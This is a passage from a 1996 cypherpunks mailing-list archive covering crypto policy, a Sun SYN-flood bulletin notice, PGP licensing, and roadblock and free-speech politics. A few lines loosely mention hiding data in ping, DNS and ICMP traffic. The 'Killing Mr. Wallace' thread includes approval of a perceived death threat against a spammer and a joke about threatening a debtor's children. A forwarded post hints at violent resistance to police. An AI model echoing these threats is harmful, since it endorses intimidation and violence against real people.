> a system that has no safeguards at all, i.e.  that could give criminals =

     You mean like Cash? The (in the US) green stuff that can be transfered 
with _no_ ID? That you can use to go down to the local convience store and 
get a money order with to send across state lines thru the US mail?

     Nah. Can't imagine what would happen with something like that. 


> all the anonimity and confidentiality they need? Governments can't =
> probably prevent criminals and the like to use encryption to stay out of =

     You could have stopped before the "and". 


> don't want TRP at all. The bottom line is that law-abiding citizens =
> always have to give up some of their freedom to stop criminals (that is =

     No, you DON'T have to. Laws make criminals, and Laws restrict freedom. 
Any law put into place to _prevent_ crime actually does the opposite. In 
what, 1907? Congress criminalized certain drugs (canabis & cocaine and some 
others) what was previously legal became a crime, and it's practicioners 
criminals. 
     If Congress criminalizes Crypto, I and others on this list will become
criminals. We will _become_ criminals to "stop" crime, and others will give
up their freedom to "stop" us from commiting "criminal" acts. 

     Your biggest fallacy (vis a vis crypto) is that criminals will _follow_
the law. They won't by defination, execpt as needed for their schemes. That
is why they are called criminals, because the commit CRIMES, not because they
follow the law. 


> why you have to have registration plates on your car, a lock on your =
> car, bicycle, house etc.). That is a fact of life; one I hate. So the =

     The lock is there to stop criminals. The registration _plate_ is there
to allow the government to collect Taxes, and track people. There are serial
numbers on cars used in theft _recovery_ rather than theft prevention. 

> Cryptopolicy is not a binary discussion; although some posters on this =
> list seem to think so.

     The middle is defined by the extremes. I'd take the most extreme possible
stance, execpt that it is where I already stand, that the government is an
_barely_ necessary evil, and needs to be made an unnecessary evil ASAP. 

> You are absolutely right. However, as said above if governments (help =
> to) set up a security system then they should at least attempt to make =
> criminal abuse difficult. The lock on my bicycle is not really 100% =
> either (as I found out quite to often); if I'd no lock at all I would =
> have a lot more problems. Also, I am *not* for a mandatory system.

     If you had _no_ lock at all, and locks weren't avaiable, guess what?
Your bike would get stolen _less_ often because you wouldn't let it out of 
your sight (well, I wouldn't let _mine_, but I spent a LOT of money (for me) 
on mine, so...) 

     And no, a lock isn't 100%. Nothing man made is. Nothing natural is.

     Ask yourself this, given a foe with more resources than you, can 
you keep him _out_ of a given computer system? Not totally. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Oct 1996 17:20:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SUN_syn
Message-ID: <1.5.4.16.19961016001859.0a0f3092@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


CIAC Bulletin H-02 issues Sun's thumb-busting god-dam-its for SYN flooding:


=============================================================================
         SUN MICROSYSTEMS SECURITY BULLETIN: #00136, 9 Oct 1996
=============================================================================

BULLETIN TOPICS

In this bulletin Sun discusses the TCP-based "SYN flood" denial-
of-service attack. We suggest ways to tune most Solaris/SunOS systems
to make them more resistant, and explain which releases and
configurations stand up best. We also discuss which customers are most
likely to be affected, and the degree to which firewalls and similar
insulating arrangements can protect an enterprise from this attack.

This Bulletin also describes the patches and other changes Sun commits
to making in the future in response to the emergence of such attacks.

This denial-of-service attack, which affects all operating systems
which implement the TCP protocol, has previously been discussed in
CERT(sm) Advisory CA-96.21, issued on 19 September 96. Attacks against
several prominent service providers have been well documented in the
last several weeks in Time magazine, the Wall Street Journal, and many
other national and international periodicals.

I.   What has Happened, Who is Affected, What to Do

II.  Understanding the Vulnerability

III. Technical Recommendations

IV.  Plans and Schedules



APPENDICES

A.   Queuing Capacity Vs. Attack Rates

B.   How to obtain Sun security patches

C.   How to report or inquire about Sun security problems

D.   How to obtain Sun security bulletins or short status updates

-----


http://jya.com/sunsyn.txt  (48 kb)


ftp://jya.com/pub/incoming/sunsyn.txt


SUN_syn





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 15 Oct 1996 20:13:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Royalties
In-Reply-To: <32639BFA.503E@pc.jaring.my>
Message-ID: <v03007807ae8a130d973b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:32 PM -0400 10/15/96, Mark O. Aldrich wrote:

>You cannot commercialize PGP whether you pay Ascom-Tech any royalties or
>not.  Phil Zimmermann grated an exclusive license to ViaCrypt, Inc. a
>number of years ago to be the sole commercial version of PGP.  In the mean
>time, PGP Inc. was formed and has acquired ViaCrypt.  Thus, PGP Inc. now
>holds the exclusive license on commercial PGP products.  Just by chance,
>Phil Zimmermann is the CEO of PGP Inc.

It seems a bit strange that PGP Inc. is so fastidious about enforcing
intellectual property claims, given the treatment of RSA Data Security
Inc.'s similar property claims a few years ago.

In other words, I don't worry for one nanosecond about "infringing" on PGP
Inc.'s claimed property rights.

Nothing personal.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 15 Oct 1996 20:26:50 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Killing Mr. Wallace of "Savetrees"?
Message-ID: <v02130501ae89a34887af@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


> Tim May wrote:
>I'm not a lawyer, but this is getting real close to the line. I doubt many
>DAs would take it seriously, but I rather expect Mr. Wallace of
>savetrees.com might discover this message and draw the reasonable inference
>that his life is being threatened.

Do you think this approach might stop the SPAM?




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 15 Oct 1996 21:13:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Your Papers Please!!! (fwd)
Message-ID: <Pine.3.89.9610152123.A1834-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


[Hmm, why the hell does pine add the .sig at the beginning of the message?]


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.


---------- Forwarded message ----------
Date: 15 Oct 1996 07:57:21 -0700
From: Johann Opitz <Johann_Opitz@smtp.svl.trw.com>
To: ca-firearms@lists.best.com
Subject: Your Papers Please!!!

WASHINGTON (Reuters) - The Supreme Court Monday (10-7-96) let stand a
precedent-setting ruling that states may establish roadblocks for the chief
purpose of intercepting illegal drugs.  [...]

The case arose out of roadblocks Florida law enforcement officials set up
on four state highways near the Georgia border in January 1984.  [...]

About 2,100 vehicles passed through the roadblocks, of which
approximately 1,300 were stopped. In all, one person was arrested for the
possession of illegal drugs while 61 traffic-related citations were also
issued.  [...]

A federal judge dismissed the lawsuit and a U.S. Court of Appeals in
Atlanta agreed. It said the chief purpose of the operation was to intercept
drugs, but ruled the state does have the power to conduct roadblocks to
check drivers' licenses and vehicle registrations.  [...]

The attorneys for the motorists urged the Supreme Court to hear the case,
saying law enforcement officials around the country were likely to adopt
similar temporary, unannounced roadblocks for drugs. But the high court
sided with the state of Florida, denying the appeal without any comment or
dissent.

========================

Speaking of roadblocks >>>>

[ The police officer who wrote the following shows what we have
  to look forward to. I guess the Supreme Court has decided it
  is OK to violate our rights just as long as we are all _equally_
  violated. -- lk ] 

Posted to texas-gun-owners by Joe Horn <6mysmesa@1eagle1.com>
------------------------------------------------------------------------
Speaking of roadblocks, Saturday, the New Mexico State Police had one set up
on NM#404, (14 officers and one Sgt.) stopping all traffic both ways on a
desert mountain pass between El Paso and White Sands. When I was stopped, a
courteous automaton approached, hand on pistol and asked for my DL and
insurance card, and did a visual search of my car. Immediately angered and
resentful of this State intrusion and violation of my rights, I handed him
the requested documents, and having checked my paperwork, he looks through
the window at the back seat area and asks me "what's under the blanket?" I
told him his search was going to have to be limited to what he could see as
I was not granting a consent search beyond what he could see through the
windows of my vehicle after illegally stopping me at this roadblock.
Illegal? Pull over there and talk to the nice officers, says he. Yes I said,
stopping people for searches in the pretext of seeing their paperwork. Says
he: the court said it's OK (in limited roadblocks )as long as we stop
everyone. Says I, the court is wrong and it's still unconstitutional, you do
not have a warrant and I have broken no law. To me, the fact they did NOT
ask for vehicle registration indicated they were fishing. The robot calls
his Sgt. over, who takes over and warns me that this can become very
unpleasant, and at this point, I show him my retired badge and ID, asking
how unpleasant is that? He then says, why didn't you say something, you
coulda been gone by now? I told him that I am a plain citizen and suggest he
knows what he's doing is wrong and that it's a pure fishing expedition. He
angrily said:(and he really surprised me) "Hey, I'm just doing what I'm
told, now get outta here before I decide to ruin your day".

They cut me loose and drove off, keeping my Ithaca 37 which was under the
blanket and 1911A1 under the center console.

My point is that this is out of control, and folks are going to start
getting hurt in these little European-like (where are your papers?)
roadblocks, fishing for whatever they can find. If I didn't have masterbadge
and I.D., I would have been illegally and unconstitutionally searched
against my will. Very few people have a badge to get them out of something
like this, and deferring to  intimidation by armed authority, most will have
their rights violated. My sense of the roadblock personnel was that
excepting the Sgt., they didn't know they were wrong or didn't care. The
average age of the officers was late 20's early 30's.

Now that they're going to start these around schools, and I assure you that
it will be in as high handed a manner as they can manage. Many people don't
see or don't want to see what's happening to the Constitution or our human
rights recognized by that Constitution, or the Police State being assembled
right around the Constitution, in the name of the "drug war" or the
"chirrun". It's here and it's here now and if you don't strenuously object
to these searches and roadblocks whether for DUI, Drivers License/Insurance/
guns/drugs, and drive your political reps nuts about it, sooner or later you
will get the anal probe of an illegal search in the name of the "drug war"
or for guns near schools. Of course those that like and feel safer with more
unenforceable, useless law and more intrusion (with no effect on criminals,
just the violation of honest citizens rights) may you be hoisted on your own
petard, and soon.

As I waited in line to be searched in this desolate and remote desert
location, I reflected on my extensive police and military training and
experience and thought that these roadblocks are really quite vulnerable out
there in the desert so far from backup. Quite vulnerable......It's going to
get ugly one day when folks decide they've had enough. And if statists don't
think it can happen here, just visualize a larger scale resentment of the
"man" beyond Watts. Like the black minority, the white minority within the
white majority has it's limits in absorbing the abuses and effects of the
ever intrusive Police State.

What really bothered me, (in spite of my training and familiarity with police
operations) was my own barely repressible reaction of fear, being trapped,
resentment, mistrust, disrespect and intense dislike and the powerful urge
to immediately, actively and physically resist this infringement of my right
of unrestricted and peaceful travel. Fortunately, I didn't have to act
because unlike most of my fellow citizens, I had a retired peace officer's
badge. What about those that feel like that and do not have a get-outta
jail/roadblock exit badge? I guess we'll soon find out when some get stopped
and fight rather than have their rights violated. It's no longer a matter of
if this is going to happen, just when.

regards

Joe Horn
List retired cop and no longer proud of it.

========================

The War on Drugs is so wonderful -- I know that it is only a few more years
before the "swastika" or the "hammer & sickle" will be flying from the
government's flag poles from the East Coast to the West Coast.

And in the name of saving all the children from the gun crimes - we'll all
have been so disarmed by the War on Guns, which was born out of the War on
Drugs, that we won't be able to stop the tyrants.

But to use the words of socialists, of social engineers -- "it's for the
better good of the community, the state, the nation, the people". Yes, being
the good socialists and social engineers that the Drug Warriors are, the
better good of the collective always takes precedence over individual rights,
over freedom and liberty.

I truly wish Hayek was wrong -- but if wishes were horses, beggers would ride.

-Johann
A Classical Liberal


== Johann Opitz   (w) johann_opitz@smtp.svl.trw.com ==
                  (h) johannp@aimnet.com
==  All Disclaimers Apply (to protect my employer)  ==






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@pc.jaring.my>
Date: Tue, 15 Oct 1996 00:04:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Royalties
Message-ID: <32639BFA.503E@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Dear C'punks

I understand from a previous post that if I were to 
commercialised PGP in a package, I have to pay some
royalties(?) to the owners(?) of IDEA. My apologies to 
the list for repeating the question which is, who
do I pay to and how much.

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Tue, 15 Oct 1996 19:09:47 -0700 (PDT)
To: Hal Finney <hal@rain.org>
Subject: Re: pgp, edi, s/mime(no need to reply)
In-Reply-To: <199610131805.LAA11401@crypt>
Message-ID: <Pine.LNX.3.95.961015210712.150B-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 13 Oct 1996, Hal Finney wrote:

> Thanks for the kind words about my participation with PGP Inc.  My comment
> was really meant more as a disclaimer, though.  Realize that I am now
> a corporate employee in the field rather than a hobbyist, so set your
> mental filters accordingly.

Nonetheless, It's always nice to see that cypherpunks still do write code
and still do run companies.  PGP remains a vital product.

Congratulations to you and best of luck on your efforts.  Your comments and
efforts have helped my understanding of crypto and it's importance.

As I said, no need to reply.  

me
p.s. I know you don't know me from cain, but I thought you'd appreciate a
comment from outside the usual suspects.
_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: latin1

iQCVAwUBMmRFIKb3EfJTqNC9AQFxpAP/Raq1phuqZhCsLDHcA9wKzr/vGlAWfa9l
Kn21z/6zej1li0cg156K89QYQY6IGge9wFeU4b+l+kW/gjqBeuEsscynSVEQDVSN
HBAqTkIOhEHBYM/RjkxMwdKYj2m5Az2a+3LDmeKJIRv55lWwx3NPS19oeEOHWRXf
dWfFbSTqU1g=
=567J
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 15 Oct 1996 18:21:52 -0700 (PDT)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <199610150402.XAA31611@mailhub.amaranth.com>
Message-ID: <Pine.SUN.3.94.961015211026.16787C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Oct 1996, William H. Geiger III wrote:

> In <Pine.SUN.3.94.961014035114.28315K-100000@polaris>, on 10/14/96 at 04:01 AM,
>    Black Unicorn <unicorn@schloss.li> said:

> >Banking is as much about confidence as any business can be.  Anonymous or not, the
> >presence of funds which
> >infringe on regulations in one area or another are frightening to normal banking
> >customers.
> 
> BULL!!!!
> 
> There are only two things the banking customers care about:
> 
> 1. Will my money be there in the morning?
> 
> 2. What is my rate of return?

Both of these are affected by large scandals at banks.

In the case of the first example, runs on banks are hardly unheard of in
relation to major and even somewhat minor revelations about the source of
deposit funds where that source is criminal.  (Again, I cite Union Bank of
Switzerland which saw a three day run of almost $200 million after
disclosures about UBS accounts which were used for kidnapping randsom.
DeBeers was one depositor which explicitly attributed their account
closures to the news).

The rate of return is directly affected by costs to the bank.  Legal costs
(even in Switzerland) of defending against government and private party
discovery and compelled disclosure are severe.  Need I even discuss the
cost to the "legitimate" BCCI account holder?

And if customers are unconcerned about elements ther than #1 and #2,
why are such pains taken to invest in offshore institutions where the
costs (in sweat alone) can be higher?

> The rest of it is a bunch of Govenment & Media hype & bull shit!!

The above incidents are easily found with a quick trip to the library.

The bottom line is that until anonyminity is not seen as some kind of
invariably criminal act with respect to banking, legitimate and
illegitimate money will be as like charged particles.

Next time, stick to web consulting.

> 
> --
> -----------------------------------------------------------
> William H. Geiger III  http://www.amaranth.com/~whgiii
> Geiger Consulting    WebExplorer & Java Enhanced!!!
> Cooking With Warp 4.0
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 15 Oct 1996 21:22:04 -0700 (PDT)
To: Peter Trei <trei@process.com>
Subject: Re: Fuck Cyberpromo
In-Reply-To: <199610151851.LAA14280@toad.com>
Message-ID: <Pine.3.89.9610152158.A1834-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain



IP fragments?

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.


On Tue, 15 Oct 1996, Peter Trei wrote:
> Those of us who occasionally dip into that Slough of Despond
> known as news.admin.net-abuse.misc are *very* familiar with
> Mr. Wallace. Check out, for example, 
> news:// 32617de2.18341458@news.onramp.net,
> where he is ignoring a court order to stop spamming.
> 
> Bouncing mail back to him may be emotionally satisfying, but
> I suspect he filters it. He also has a skin as thick as a rhino's.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 15 Oct 1996 18:23:50 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Killing Mr. Wallace of "Savetrees"?
In-Reply-To: <v03007800ae88ce3644c9@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.961015212157.16787D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Oct 1996, Timothy C. May wrote:

> It looks like Jim Bell is arranging a contract on Mr. Wallace (apparently
> the operator of "abusebot@savetrees.com," and other obnoxious spambots
> assocated with Cyberpromo).
> 
> At 7:06 PM -0800 10/14/96, jim bell wrote:

> >>So what steps do we need in putting some teeth into this?
> >
> >"You rang, Sir?"
> 
> Careful, Jim, you are coming _very_ close to crossing the line. You appear
> to be volunteering to have Mr. Wallace (and perhaps his family?) killed.
> 
> Arguing theoretical implications of what you call "AP" is substantially
> different from saying "You rang?" when your frequent posts about AP being
> the solution make it clear you are referring to AP here.
> 
> I'm not a lawyer, but this is getting real close to the line. I doubt many
> DAs would take it seriously, but I rather expect Mr. Wallace of
> savetrees.com might discover this message and draw the reasonable inference
> that his life is being threatened.

God I hope so..

> 
> --Tim May
> 
> "The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
> that the National Security Agency would try to twist their technology."
> [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 15 Oct 1996 21:16:09 -0700 (PDT)
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Crypto: Systems & Application Developers Wanted
Message-ID: <3.0b28.32.19961015212352.006f7d00@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:11 PM 10/15/96 -0400, Mark Aldrich wrote:
>On Sat, 12 Oct 1996, SPYRUS wrote:
>
>> SPYRUS, the leading provider of cryptographic tokens (PC cards & 
>>      Smart Cards), with associated systems and applications software, is 
>>      looking for engineers with the following qualifications to work 
>> with
>>      our Secure Applications Group in San Jose, CA:

>Uh, excuse me, but doesn't SPYRUS in fact market a Fortezza card?  The
>very same card being used by the Evil Empire to spread diseased and impure
>so-called "cryptography" (with GAK permanently embedded into it) to the
>uninformed minions? 

Uninformed? It's right in their name: SPY-R-US. Just don't tell Toys 'R Us,
they've been on a trademark litigation jag lately. 

(but it might save everyone some time if they added "Not concerned about
the long-term effect your work has on the quality of human life & freedom"
to the list of qualifications required.)

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Tue, 15 Oct 1996 19:26:11 -0700 (PDT)
To: Sandy Sandfort <cypherpunks@toad.com>
Subject: Re: PLEDGES
In-Reply-To: <Pine.SUN.3.91.961015085426.2814D-100000@crl.crl.com>
Message-ID: <199610160320.VAA15161@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.91.961015085426.2814D-100000@crl.crl.com>, on 10/15/96 
   at 08:56 AM, Sandy Sandfort <sandfort@crl.com> said:

-.Paul,

-.You wrote:

-.> What the hell, I'll spring for $200.  It would be the needed 
-.> excuse to leave San Diego anyway.

-.Wah whoo!  This, plus some other new pledges puts us over the $1000
-.mark.  Now all we need is some show of intestinal fortitude from
-.Dimitri.
-.
        well, if we can get Dimitri to be the victim, I would enjoy 
    nothing more than exercising some well honed skills of cynicism,
    sarcasm, and the classic art of insult on *his* chosen subject(s).

        take no prisoners!

        the fact English may not be his native language (the Russians
    require fluency in American English to matriculate past age 14) 
    --I have no conscience, in other words,...

        of course, that assumes you will tolerate a roast where the
    stated goal is his resignation from the list; maybe we can send him
    off to Perry who apparently has become too personally disgruntled to
    stay with us.  ??--after all, code is on coderpunks.

        several literate assaults managed to clear Dr. Fred from the 
    list.  Dimitri just does not know when to quit.

            ...attila out!

--
  "A grant of relief 
    that varies inversely with earnings 
    is the worst form of subsidy, 
    since it destroys the incentive
    for the worker to demand, 
    or the employer to offer, higher wages."
        --T.S. Ashton's 'The Industrial Revolution 1760-1830'







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 15 Oct 1996 18:38:36 -0700 (PDT)
To: nelson@media.mit.edu (Nelson Minar)
Subject: Re: Stego via TCP/IP (was Re: crypto wish list)
In-Reply-To: <cpag23gjc4v.fsf@hattrick.media.mit.edu>
Message-ID: <199610160244.VAA01593@homeport.org>
MIME-Version: 1.0
Content-Type: text


Nelson Minar wrote:
| What, a discussion of cryptography on the cypherpunks list?
| 
| aba@dcs.ex.ac.uk (Adam Back) writes:
| >>Where is highly sophisticated stego?
| >What are our options?
| >- Stego in english text.
| >- Stego in audio and graphic file formats
| >- Stego in Internet Phone protocols.
| >- Stego in Internet video conference formats
| 
| What about stego in IP itself? It's been awhile since I've looked, but
| aren't there some bits one could subvert in the TCP/IP headers themselves?

	A bunch of must be zeros.  Easy to see.  A machine with two
interfaces could send data by choosing the interface to send on.
Ping, DNS, and ICMP all have lots of space for data.

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 15 Oct 1996 21:44:11 -0700 (PDT)
To: cypherpunks@toad.com>
Subject: Re: "Right to Privacy" and Crypto
Message-ID: <199610160443.VAA02692@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:40 PM 10/15/96 +0000, attila@primenet.com wrote:
>            the first sort of stands, but consider that the right
>            to privacy and the freedom of speech should also include
>            the right NOT to speak --that has been gutted by the
>            rulings on the fifth.

The limits on free speech in the workplace, and their gradual extension to
non-work environments make me think the first is going down the tubes too.


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 15 Oct 1996 21:54:45 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: More threats from FOTM (Friends of Timmy May)
In-Reply-To: <H3DVVD7w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961015214555.7815A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 15 Oct 1996, Dimitri wrote:

> Anyway, if you want a videotape, I'll put one together. If not, 
> I won't.

As previously stated, the video would be fine as part of a live
presentation.  Unfortunately, we still have yet to hear from
Dimitri on whether or not he will be our guest.

Dimitri, would you please let me know what it takes to get a 
straight (and I use the term advisedly) yes or no out of you?
I have asked you numerous times for your answer, yet you have
not given me courtesy of a direct response.  

Does anyone remember the Russian word for "uncultured"?  It was
in one or two of Tom Clancy's books.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 15 Oct 1996 22:14:55 -0700 (PDT)
To: "Bruce M." <bkmarsh@feist.com>
Subject: Re: Killing Mr. Wallace of "Savetrees"?
In-Reply-To: <Pine.BSI.3.91.961015092349.21730B-100000@wichita.fn.net>
Message-ID: <32646ABD.59FE@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bruce M. wrote:
> On Mon, 14 Oct 1996, Timothy C. May wrote:
> > At 7:06 PM -0800 10/14/96, jim bell wrote:
> > >At 04:26 PM 10/14/96 -0400, Ray Arachelian wrote:
> > >>On Sun, 13 Oct 1996, Roy M. Silvernail wrote:
> > >>I'd like to join you on this.  I have sent email to
> > >>wallace@asswipespamnet already as well as left them voice mail for every
> > >>message they sent, they will be charged $500 per message and the next one
> > >>I receive constitutes acceptance.  I've since then recieved about 4-5
> > >>more, which means they owe me $2000 or thereabouts. :)
> > >>So what steps do we need in putting some teeth into this?

> > >"You rang, Sir?"

> > Careful, Jim, you are coming _very_ close to crossing the line. You appear
> > to be volunteering to have Mr. Wallace (and perhaps his family?) killed.

>     I see nothing in any of these messages about the murder or even
> slightest physical attack against Mr. Wallace.  Instead "putting some
> teeth into this" looks like it implies taking further actions
> on collecting a debt.  I suppose one extreme way of interpreting that
> would be to kill the debtor.

Rule #4 via Joey the Hit Man:  Never kill someone who owes you money. 
You gotta find some way to convince them to pay it back, i.e., "hey, Mr. 
Zzyzx, nice looking kids you got there. Too bad if something happened to 
one of 'em."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 15 Oct 1996 22:02:01 -0700 (PDT)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: mail software for multiple addrs
Message-ID: <199610160502.WAA05143@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 15 Oct 96 at 18:46, Vladimir Z. Nuri wrote:

> 1. multiple internet providers
> 2. multiple email accounts
> 3. multiple mailing lists

How about Pegasus?

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Tue, 15 Oct 1996 19:21:02 -0700 (PDT)
To: Dale Thorn <cypherpunks@toad.com>
Subject: Re: LET'S MEET DIMITRI (WHO CARES?)[RANT]
In-Reply-To: <32632092.10EF@gte.net>
Message-ID: <199610160320.VAA15156@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <32632092.10EF@gte.net>, on 10/14/96 
   at 10:26 PM, Dale Thorn <dthorn@gte.net> said:

-.[snip, snip]

-.Pardon me, Alex (and other fellow "flame"rs), but the ranting, 
-.name-calling, acting like children, etc. are ALL (repeat, ALL) much more
-. interesting to read than the self-pitying, self-centered slobbering 
-.you're adding to the list.  If you could *not* be a child yourself for 
-.just a little bit, you could go do something worthwhile, like feed the 
-.homeless or something.
-.
        a little brutal, is it not, Dale?  I can still hear the 
    whimpering!

        what gets me going on Dimitri is that he is using current topics 
    to slide his stupidity into your consciousness.  Dimitri, I kill 
    filed; I do not wish to killfile all the anon servers --too much 
    work to pick up some that Levian does not list.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 15 Oct 1996 20:27:02 -0700 (PDT)
To: Matthew Ghio <ghio@myriad.alias.net>
Subject: Re: Sameer should sue the SPA
In-Reply-To: <199610150743.DAA06174@myriad>
Message-ID: <Pine.OSF.3.91.961015222314.13706A-100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Civil RICO may also apply, if it can be shown that this type of behavior 
falls under a pattern racketeering.

Dan


On Tue, 15 Oct 1996, Matthew Ghio wrote:

> Let's see, what can Sameer sue the SPA for...
> 
> 1) Filing a frivilous lawsuit, of course.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
